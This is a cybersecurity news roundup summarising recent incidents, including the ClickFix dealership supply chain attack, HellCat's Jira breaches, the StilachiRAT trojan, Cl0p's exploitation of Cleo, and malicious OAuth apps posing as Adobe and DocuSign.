Supply chain attack compromises 100 car dealerships through a malicious “ClickFix” code
Over 100 car dealership websites were compromised in a supply chain attack after a third-party provider, LES Automotive, was infected with malicious "ClickFix" code.
Researchers found that all websites using LES Automotive’s services unknowingly delivered a ClickFix page to visitors. The attack tricked users into copying and pasting a malicious command into the Windows Run prompt, allowing attackers to execute SectopRAT malware. This technique has been seen before, including an October 2024 campaign in which a ClickFix variant, disguised as a fake browser update, infected over 6,000 WordPress sites in a single day.
It is already the second major supply chain attack that has affected large numbers of dealerships in less than a year, with the previous one involving a CDK attack in June of 2024.
Swiss telecom company Ascom confirms cyberattack by HellCat hacking group targeting Jira servers
Swiss telecommunications company Ascom, with an annual revenue of €299.7 million in 2024, confirmed a cyberattack on its IT infrastructure, with the HellCat hacking group targeting Jira servers worldwide using compromised credentials.
The company stated that attackers breached its technical ticketing system on Sunday but assured that business operations remain unaffected, and no preventive action is required from customers or partners. HellCat claimed responsibility for the attack, saying they stole 44GB of data, including source code, invoices, confidential documents and project details. Hellcat has previously targeted major companies like Schneider Electric, Telefónica and Orange Group by exploiting Jira credentials.
Recently, they also breached Jaguar Land Rover’s Jira system, leaking sensitive development logs, tracking data and employee information. They claimed to have stolen a database with a little over 470,000 “unique emails” and more than 780,000 records.
Remote access trojan StilachiRAT steals sensitive data, including credentials and cryptowallets
Researchers have identified a new remote access trojan (RAT) called StilachiRAT, which uses advanced evasion techniques to steal sensitive data from targeted systems.
The malware, discovered in November 2024, can extract credentials, clipboard data, digital wallet information and system details, including BIOS serial numbers and active RDP sessions. It specifically targets cryptocurrency wallet extensions in Google Chrome, such as MetaMask, Trust Wallet and Coinbase Wallet, among others.
StilachiRAT communicates with a command-and-control (C2) server, allowing attackers to execute commands like clearing event logs, shutting down systems, launching applications and stealing passwords. It also employs anti-forensic measures by detecting analysis tools and sandbox environments to avoid detection.
Cl0p ransomware group uses Cleo file transfer tool to breach data of Western Alliance Bank
Western Alliance Bank is notifying 22,000 customers that their personal data was stolen in a breach linked to Cl0p’s exploitation of the Cleo file transfer tool. The attack occurred in October 2024 when attackers exploited an unknown vulnerability to access parts of the bank’s systems and steal sensitive files.
By January 2025, the bank confirmed data was compromised, and in February, it determined that stolen information included Social Security numbers, driver’s license details, financial account numbers and tax IDs. Affected individuals are being offered one year of identity protection services, and the breach was reported to the Maine Attorney General’s Office.
Western Alliance disclosed to the SEC that it learned of the breach after stolen data was published online but stated the incident would not materially impact its financial condition. Security experts confirm that Cl0p exploited Cleo vulnerabilities, tracked as CVE-2024-50623 and CVE-2024-55956, to target multiple organizations. In 2025, Cl0p claimed responsibility for 332 unconfirmed attacks, most linked to Cleo’s security flaws, highlighting the ongoing risks of supply chain breaches.
Microsoft 365 accounts targeted by malicious OAuth apps disguised as Adobe and DocuSign apps
Cybercriminals are deploying malicious Microsoft OAuth applications disguised as Adobe and DocuSign apps to compromise Microsoft 365 account credentials.
These highly targeted campaigns involve fraudulent apps such as "Adobe Drive," "Adobe Acrobat" and "DocuSign," which request minimal permissions like 'profile,' 'email' and 'openid' to avoid detection. Once granted, attackers gain access to user information, facilitating further targeted attacks.
The phishing emails, sent from compromised accounts of small organizations, have targeted various U.S. and European industries, including government, health care, supply chain and retail sectors. After authorization, users are redirected to malicious landing pages that either harvest Microsoft 365 credentials or distribute malware.
